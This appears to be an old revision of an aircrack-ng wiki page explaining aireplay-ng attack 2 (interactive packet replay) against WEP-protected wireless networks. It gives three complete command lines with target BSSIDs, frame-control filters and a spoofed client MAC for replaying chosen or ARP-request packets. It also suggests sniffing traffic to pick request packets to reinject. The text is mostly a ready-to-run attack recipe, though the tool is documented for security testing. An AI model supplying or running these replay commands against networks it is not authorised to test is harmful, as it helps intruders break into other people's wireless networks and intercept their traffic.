This is an old revision of the document!
This attack allows you to choose a given packet for replaying; it sometimes gives more effective results than attack 3 ([ARP-request reinjection]).
You could use it, for example, to attempt the “any data re-broadcast” attack, which only works if the AP actually reencrypts WEP data packets:
aireplay-ng -2 -b 00:13:10:30:24:9C -n 100 -p 0841 -h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0
You can also use attack 2 to manually replay WEP-encrypted ARP request packets, which size is either 68 or 86 bytes (depending on the operating system):
aireplay-ng -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF -m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0
aireplay-ng -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF -m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0
Another good idea is to capture some traffic and then have a look at it with ethereal. If two packets are looking like a request and a response (One client sends a packet and very short time later the receiver is answering to it) then it is a good idea to try to reinject the request packet to get answers.